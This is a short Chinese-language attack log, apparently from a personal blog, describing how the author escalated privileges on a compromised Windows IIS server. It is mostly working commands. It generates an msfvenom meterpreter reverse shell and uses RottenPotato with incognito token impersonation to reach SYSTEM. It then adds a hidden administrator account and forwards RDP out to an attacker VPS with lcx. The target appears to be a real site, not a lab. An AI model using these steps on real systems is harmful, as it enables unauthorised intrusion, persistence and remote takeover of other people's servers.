此次主題:爛土豆
shell咋拿的 我也忘了 好像是添加友情鏈接那里還是啥 不重要了
直接獲取shell后 先用systeminfo > 1.txt了一下 然后放到了 windows-exploit-suggester 里跑了一下
出來了有這幾個
然后嘗試用MS16-075進行提權 emm 最后有點懵逼
沒咋搞懂
后來看一些文章 用到了爛土豆!! 我也直接上爛土豆了
先用msf獲取shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=port -f exe > /tt.exe
然后msf再設置lhost lport run
打到shell
然后使用ms16-075
emm 簡單流程是這樣
先常規一波 getsystem !! 成功失敗
重頭戲 爛土豆
傳到目標服務器上
我用的蟻劍
然后進去竊取令牌的模塊
use incognito
list_tokens -u
IIS我們本來的權限 很低!!
進入到那個文件的目錄里
運行他
execute -cH -f ./rottenpotato.exe
重新list_tokens -u
system出來了
然后impersonate_token "NT AUTHORITY\\SYSTEM"
綠了 綠了 成功system
進入shell
改編碼
chcp 65001
加個用戶
加上administrator
net localgroup administrators diaomao /add
直接連3389並沒成功 拿出LCX端口轉發一下 !!! 令人氣憤的是 找了幾個lcx都不可以 最后還是找到了個能用的
vps端
lcx.exe -listen 51 5678
把51端口 轉到5678端口上
受害機
lcx.exe -slave VPS的IP 51 本地IP 3389
然后本地直接127.0.0.1:5678
成功拿捏